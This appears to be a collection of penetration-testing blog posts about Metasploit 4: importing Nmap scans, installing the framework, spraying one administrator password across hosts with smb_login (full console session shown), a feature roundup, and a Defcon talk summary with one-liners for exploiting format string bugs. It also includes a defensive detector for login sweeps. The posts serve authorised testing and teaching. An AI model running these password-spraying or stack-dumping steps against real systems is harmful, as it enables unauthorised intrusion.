
Importing and Working with Nmap Scans in Metasploit Framework 4

Posted by Mark Marshall in Main

Importing Nmap scans directly into Metasploit is one of the best time-saving tricks you can accomplish while using the Metasploit Framework. Once the full Nmap data is happily in your PostgreSQL database and accessible to Metasploit you can do all kinds of cool things with it that will save you lots of time and frustration on a large penetration test.
For this example I’m assuming you’ve got a fully functional PostgreSQL database already configured and accessible to Metasploit. This is normally the case if you’ve performed a full install of Metasploit 4. I’ll cover the basics of setting up and connecting to a PostgreSQL database in a future post.
Run db_status to determine if your database is set up properly and accessible to Metasploit. If you see the following output you are set:

msf > db_status
[*] postgresql connected to msf_database

To start, you need Nmap output saved to a file. Do this by feeding Nmap the -oA flag when you scan which will save the results in all 3 major file formats: XML, Nmap and Grepable.
From within msfconsole import your scan data:

msf > db_import 192.168_scan.xml
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.4.3.1'
[*] Importing host 192.168.1.1
[*] Importing host 192.168.1.2
[*] Importing host 192.168.1.3
[*] Importing host 192.168.1.4
[*] Importing host 192.168.1.7
[*] Importing host 192.168.1.9
[*] Importing host 192.168.1.10
[*] Importing host 192.168.1.13
[*] Importing host 192.168.1.15
[*] Importing host 192.168.1.16
[*] Importing host 192.168.1.22
[*] Importing host 192.168.1.100
[*] Successfully imported /home/mark/192.168_scan.xml

Once this completes successfully your Nmap data will be contained in the PostgreSQL database and fully accessible to Metasploit. This opens up all kinds of flexibility that will really save your bacon on large scans.
If you want to, you can also perform Nmap scans directly from within the Metasploit Framework and have the results automatically added to the database. To do this use the db_nmap command followed by the flags you wish to use and the hosts or subnets you want to scan. I typically like to do Nmap scanning outside of Metasploit in order to have more flexibility about the types of scans I perform, and I may run many different scans and cat them together or otherwise manipulate them prior to feeding them into Metasploit. Obviously, do what makes sense for your situation.
Type ‘hosts’ to get a list of all hosts in the database. Use ‘hosts -u’ to get a list of only hosts that respond to ping and are believed to be up.

msf > hosts -u
Hosts
=====
address        mac  name             os_name  os_flavor  os_sp  purpose  info  comments
-------        ---  ----             -------  ---------  -----  -------  ----  --------
192.168.1.1                          Unknown                    device
192.168.1.10        goro.home        Unknown                    device

You can also query based on services. Execute ‘services’ with no parameters to dump all hosts and all services in the database. This isn’t particularly useful and can be quite huge depending on the scan data that you’re working with. Thankfully you can filter this further before it’s output to the console. Use the -p flag to only list specific ports you’re interested in.

msf > services -p 445 -u
Services
========
host           port  proto  name          state  info
----           ----  -----  ----          -----  ----
192.168.1.10   445   tcp    microsoft-ds  open   Samba smbd 3.X workgroup: SKYNET
192.168.1.100  445   tcp    microsoft-ds  open
192.168.1.11   445   tcp    netbios-ssn   open
192.168.1.2    445   tcp    microsoft-ds  open
192.168.1.22   445   tcp    microsoft-ds  open
192.168.1.4    445   tcp    microsoft-ds  open   Microsoft Windows 2003 or 2008 microsoft-ds
192.168.1.6    445   tcp    netbios-ssn   open
192.168.1.9    445   tcp    microsoft-ds  open

Here I’m listing only hosts that have 445/tcp open. I’ve also added the -u flag to only show services that are open.
If you’re a narcissist, at this point you’re probably thinking “big whoop, I can do all this via a few grep strings on the Nmap output”. And you’re correct.
Now to do something useful with this.

msf > services -p 445 -R

Services
========

host           port  proto  name          state  info
----           ----  -----  ----          -----  ----
192.168.1.10   445   tcp    microsoft-ds  open   Samba smbd 3.X workgroup: SKYNET
192.168.1.100  445   tcp    microsoft-ds  open
192.168.1.11   445   tcp    netbios-ssn   open
192.168.1.2    445   tcp    microsoft-ds  open
192.168.1.22   445   tcp    microsoft-ds  open
192.168.1.4    445   tcp    microsoft-ds  open   Microsoft Windows 2003 or 2008 microsoft-ds
192.168.1.6    445   tcp    netbios-ssn   open
192.168.1.9    445   tcp    microsoft-ds  open

RHOSTS => file:/tmp/msf-db-rhosts-20110909-32464-oyzbko

Looks the same as before, but by adding the -R flag you’ve told Metasploit to set the RHOSTS variable to the output of the database query you’ve just performed. This is reflected in the last line of output, which is the name of the file Metasploit created and populated with the hosts you selected from the database.
Now select an exploit to use against these hosts:

msf > use auxiliary/scanner/smb/smb_enumusers
msf  auxiliary(smb_enumusers) > show options

Module options (auxiliary/scanner/smb/smb_enumusers):

   Name       Current Setting                                Required  Description
   ----       ---------------                                --------  -----------
   RHOSTS     file:/tmp/msf-db-rhosts-20110909-32464-oyzbko  yes       The target address range or CIDR identifier
   SMBDomain  WORKGROUP                                      no        The Windows domain to use for authentication
   SMBPass                                                   no        The password for the specified username
   SMBUser                                                   no        The username to authenticate as
   THREADS    1                                              yes       The number of concurrent threads

As you can see, Metasploit has filled in the RHOSTS variable automatically for this exploit. You don’t need to have a pre-selected exploit in order for Metasploit to do this, and can choose an exploit after you’ve piped the output of a database query to the input of the RHOSTS variable.
Using Metasploit Framework 4 tied to a database is a great way to save time and effort while working with large projects and scans of several hundred to several thousand hosts and many more services.
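To show what db_import, ‘services -p 445 -u’ and ‘services -p 445 -R’ actually compute, here is an added example (not code from the post or from Metasploit) that parses a constructed Nmap XML fragment with the standard library and produces the same host list RHOSTS would point at; it keeps only open ports, as the -u flag does.

```python
import xml.etree.ElementTree as ET

# Constructed Nmap XML, not the post's own scan: four hosts with mixed port states.
NMAP_XML = """<nmaprun scanner="nmap">
  <host><status state="up"/>
    <address addr="192.168.1.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="192.168.1.4" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="filtered"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
  <host><status state="down"/><address addr="192.168.1.7" addrtype="ipv4"/></host>
  <host><status state="up"/>
    <address addr="192.168.1.22" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
</nmaprun>
"""

def parse_services(xml_text):
    """Flatten Nmap XML into (host, port, proto, name, state) rows,
    the same columns Metasploit's 'services' table shows after db_import."""
    rows = []
    for host in ET.fromstring(xml_text).findall("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        for port in host.findall("ports/port"):
            svc = port.find("service")
            rows.append((addr.get("addr"), int(port.get("portid")), port.get("protocol"),
                         svc.get("name") if svc is not None else "",
                         port.find("state").get("state")))
    return rows

def services(rows, port=None, up_only=False):
    """Mirror 'services -p PORT -u': filter by port and, optionally, open state."""
    return [r for r in rows
            if (port is None or r[1] == port) and (not up_only or r[4] == "open")]

def rhosts(rows, port):
    """Mirror 'services -p PORT -R': the unique hosts with that port open,
    one per line, the content of the file: path RHOSTS is set to."""
    hosts = {r[0] for r in services(rows, port, up_only=True)}
    ordered = sorted(hosts, key=lambda a: tuple(int(o) for o in a.split(".")))
    return "\n".join(ordered) + "\n"
```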

Installing Metasploit 4 in Ubuntu 11.04

Posted by Mark Marshall in Main

Install the latest version of the Metasploit 4 Framework (MSF4) on Ubuntu 11.04 Natty Narwhal using the following commands. This downloads and installs the generic Linux binary, which comes bundled with all the necessary components you need for Metasploit to install and run. This should work for most users and is the easiest way to get the Metasploit Framework running quickly under Ubuntu and other Debian-based Linux distros.

In a Terminal type the following:

wget http://updates.metasploit.com/data/releases/framework-4.0.0-linux-full.run

If you’re installing on a 64-bit build of Ubuntu, use this instead:

wget http://updates.metasploit.com/data/releases/framework-4.0.0-linux-x64-full.run

This downloads the current version of the Metasploit framework via wget.
Before you can run the installer you need to make it executable (the wildcard below matches both the 32-bit and the x64 installer names).

chmod +x framework-4.*-linux-*full.run

And now execute the installer.

sudo ./framework-4.*-linux-*full.run

Assuming all went well MSF 4 should now be installed. You should update it before running it.

sudo msfupdate

Now run it.

msfconsole

You should now be rewarded by one of the awesome ascii art logos and a functional Metasploit install.

If this fails for any reason you’ll want to do a manual install instead, which is a bit more complicated but, if followed correctly, should get you up and running. Find the official directions at Rapid7.

Testing Windows Passwords with Metasploit

Posted by Mark Marshall in Main

An attacker will take the path of least resistance in order to gain access to critical systems and data. During a penetration test we’ll take the same tactic as well.

Frequently this is accomplished by guessing the password to a user’s account and then either using the privileges of that account to gain access to critical data or escalating that account to an administrator or root level account. Once credentials have been acquired for one host you’ll want to determine what other systems they work against. It is fairly common to gain access to a local administrator account on a workstation or server, for example, but not a domain account, and in this case you will want to try that local administrator account against a whole slew of other systems.

There are a number of ways to accomplish this task but one of the most efficient ways is using the smb_login module of Metasploit Framework 4 to test a single username/password combination against a lot of boxes very quickly.

msf > use auxiliary/scanner/smb/smb_login
msf  auxiliary(smb_login) > set smbpass Password!
smbpass => Password!
msf  auxiliary(smb_login) > set smbuser administrator
smbuser => administrator
msf  auxiliary(smb_login) > set user_as_pass false
user_as_pass => false
msf  auxiliary(smb_login) > set rhosts 10.0.0.100-110
rhosts => 10.0.0.100-110
msf  auxiliary(smb_login) > show options
Module options (auxiliary/scanner/smb/smb_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASS_FILE                          no        File containing passwords, one per line
   PRESERVE_DOMAINS  true             no        Respect a username that contains a domain name.
   RHOSTS            10.0.0.100-110   yes       The target address range or CIDR identifier
   RPORT             445              yes       Set the SMB service port
   SMBDomain         WORKGROUP        no        SMB Domain
   SMBPass           Password!        no        SMB Password
   SMBUser           administrator    no        SMB Username
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      true             no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
msf  auxiliary(smb_login) > exploit

[*] 10.0.0.100:445 SMB - Starting SMB login bruteforce
[*] 10.0.0.101:445 SMB - Starting SMB login bruteforce
[*] Scanned 02 of 11 hosts (018% complete)
[*] 10.0.0.102:445 SMB - Starting SMB login bruteforce
[*] Scanned 03 of 11 hosts (027% complete)
[*] 10.0.0.103:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 04 of 11 hosts (036% complete)
[*] 10.0.0.104:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 05 of 11 hosts (045% complete)
[*] 10.0.0.105:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 06 of 11 hosts (054% complete)
[*] 10.0.0.106:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 07 of 11 hosts (063% complete)
[*] 10.0.0.107:445 SMB - [1/2] - Starting SMB login bruteforce
[*] 10.0.0.107:445 SMB - [1/2] - |WORKGROUP - FAILED LOGIN (Windows 5.1) administrator :  (STATUS_LOGON_FAILURE)
[+] 10.0.0.107:445|WORKGROUP - SUCCESSFUL LOGIN (Windows 5.1) 'administrator' : 'Password!'
[*] Scanned 08 of 11 hosts (072% complete)
[*] 10.0.0.108:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 09 of 11 hosts (081% complete)
[*] 10.0.0.109:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 10 of 11 hosts (090% complete)
[*] 10.0.0.110:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 11 of 11 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(smb_login) >

In this example I successfully compromised one of my test systems that was using the password ‘Password!’ for the local administrator account. This may seem far-fetched, but I’ve seen worse than this before on engagements.

Be aware that this type of activity is very noisy and easily detectable by a sysadmin or security goon, as it will create a failed login attempt for the Administrator account on every machine in the subnet.
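The noise described above is exactly what a defender should look for. As an added example (not part of the original post), here is detection logic run over constructed, centrally forwarded Windows logon events in an assumed one-line-per-event format (timestamp, reporting host, event id, target account, source address); it flags one source address failing to log on (event 4625) as the same account against many distinct hosts inside a short window, the signature an smb_login sweep leaves behind.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events, not real log data. Format (assumed):
# timestamp host event_id target_account source_address
LOG_LINES = """\
2011-09-09T10:00:01 ws100 4625 administrator 10.0.0.5
2011-09-09T10:00:02 ws101 4625 administrator 10.0.0.5
2011-09-09T10:00:02 ws102 4625 administrator 10.0.0.5
2011-09-09T10:00:03 ws103 4625 administrator 10.0.0.5
2011-09-09T10:00:04 ws104 4625 administrator 10.0.0.5
2011-09-09T10:00:05 ws107 4624 administrator 10.0.0.5
2011-09-09T10:03:10 ws101 4625 jsmith 10.0.0.41
2011-09-09T11:30:00 ws102 4625 jsmith 10.0.0.41
"""

def parse_events(text):
    """Parse the assumed format into (timestamp, host, event_id, account, source) tuples."""
    events = []
    for line in text.splitlines():
        ts, host, event_id, account, src = line.split()
        events.append((datetime.fromisoformat(ts), host, int(event_id), account, src))
    return events

def detect_login_sweeps(events, min_hosts=4, window=timedelta(minutes=5)):
    """Return (source, account, distinct_hosts, window_start) for every source/account
    pair whose failed logons (4625) touched at least min_hosts distinct hosts
    within one sliding window. A success (4624) after the failures, as in the
    post's 10.0.0.107 example, does not suppress the alert."""
    failures = defaultdict(list)
    for ts, host, event_id, account, src in events:
        if event_id == 4625:
            failures[(src, account)].append((ts, host))
    alerts = []
    for (src, account), hits in failures.items():
        hits.sort()  # chronological, so the window can slide forward
        for i, (start, _) in enumerate(hits):
            hosts = {h for t, h in hits[i:] if t - start <= window}
            if len(hosts) >= min_hosts:
                alerts.append((src, account, len(hosts), start))
                break  # one alert per source/account pair is enough
    return alerts
```

A single user mistyping a password against a couple of machines (jsmith above) stays below the threshold; tune min_hosts and window to the size of the environment.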

Metasploit 4.0 Highlights

Posted by Mark Marshall in Main

Earlier this week HD Moore gave a live webcast demoing the new, highly anticipated Metasploit 4 release. The live demo went as smoothly as a live demo can go, and as always HD Moore is great to hear talk no matter what the topic is. This presentation was particularly excellent because he’s so passionate about the Metasploit project, which he single-handedly created nearly 10 years ago and has since watched grow into the de facto tool used by penetration testers and infosec warriors.

Some statistics about Metasploit over the years:

  • 2003 – Metasploit 1.0 – 11 exploits
  • 2004 – Metasploit 2.0 – 18 exploits
  • 2007 – Metasploit 3.0 – 177 exploits
  • 2011 – Metasploit 4.0 – 716 exploits

  • 1 million unique downloads in the past 12 months
  • Rapid7 sponsorship of Metasploit has doubled the line count of the codebase

HD’s excitement over new features that he and his team have been working on for nearly a year was quite obvious, and he said that they’ve barely slept in the last 3 months as the release date looms ever closer and crunch time arrives.

Going through every new feature is beyond the scope of this quick blog post, so here are the highlights as shown in the slides.

I’ll touch on a couple of new features and why they’re interesting. A number of new features are exclusive to Metasploit Pro, but a lot of the core stuff is available in every version of Metasploit, including the Metasploit Framework which is free and open source.

  • Optimization for large scale penetration tests. Previously Metasploit really didn’t scale beyond a thousand hosts. Now it’s possible to load full vulnerability scans of upwards of 10,000 hosts without any issue.
  • Standardized XML API. The entire XML API is documented and will be released under an open source license.
  • Persistent agents and listeners. This is sweet. Now if you lose connection with a box you’ve compromised, all isn’t lost. You can set up the payload to persistently attempt reconnects back to your listener, so a temporary network outage or a dropped WiFi connection no longer costs you the session. You can configure every aspect of it too: set an expiration date after which it’ll remove itself, and other fun stuff.
  • Full integration with John the Ripper. Rapid7 now sponsors the JtR project, and has fully integrated it into MSF. As sad as it is, most compromises happen via a trivially guessed password on a critical box. MSF now has many, many options for mutating wordlists as well as seeding password lists with data discovered during scanning.
  • Full remote control of MSF via a brand new RPC interface written in Ruby (msfrpc-client).
  • Support for imports from over a dozen other scanners, including Appscan, Netsparker and many more.
  • Shiny graphs and pretty pictures to look at. Don’t really care about this, but it’s great for higher level suits and execs. MSF can now spit out a pretty report with all kinds of details and graphs after the pentest is complete.

And the obligatory screenshot of the brand new interface.

Metasploit 4 looks like a great release and continues Rapid7’s charge into the enterprise market, but without totally alienating the core users who’ve been using MSF for years.

Defcon: Advanced Format String Attacks

Posted by The Shell Shakespear

Congratulations to those that survived the giant hangover that was Defcon 18, my presentation on Advanced Format String Attacks, and especially the post-talk Q&A and Mario Kart. My presentation was a continuation of my previous Automatic Format String Exploitation research, and I have updated the materials from the presentation here: defcon-18-paul_haas-advanced_format_string_attacks_final.pdf. I have also uploaded the demos from my talk, sans voice:

Demo 1: Attacking a program vulnerable (Makefile) to a format string attack, we dump the stack of the program until we find our passed format string using the following code:
for i in {001..200}; do echo -n "offset $i (%$i\$08x) = "; ./printf "%$i\$08x" | python -c "import sys, struct; s=int(sys.stdin.read(),16); print '0x%08x: %s' % (s,repr(struct.pack('L',s)))"; done

Demo 2: Finding the address of our format string. This, combined with the stack offset found in the previous step, lets us associate any data on the stack with its address using the following code:
for i in {1..100}; do ./printf "offset $i = %$i\$p:%$i\$s"; echo; done | grep -v ^$

Demo 3: Video of our technique, demonstrated in our previous POC tool, automatically exploiting a program vulnerable to a format string attack by locating the stack offset and address of our exploit and overwriting a known return location.

Demo 4: Automatically exploiting a program vulnerable to a format string attack by locating the stack offset and address of our exploit and brute-forcing addresses on the stack for a valid return location. This includes both a Python and a Ruby implementation.

Demo 5: Metasploit demonstration of a remote server vulnerable to a format string attack, exploited automatically by locating the stack offset and address of our exploit and brute-forcing addresses on the stack for a valid return location. The Metasploit module and vulnerable server are available for download.

All of the above plus additional documentation can be downloaded in a single archive here: DEFCON-18-Haas-Adv-Format-String-Attacks.tar.bz2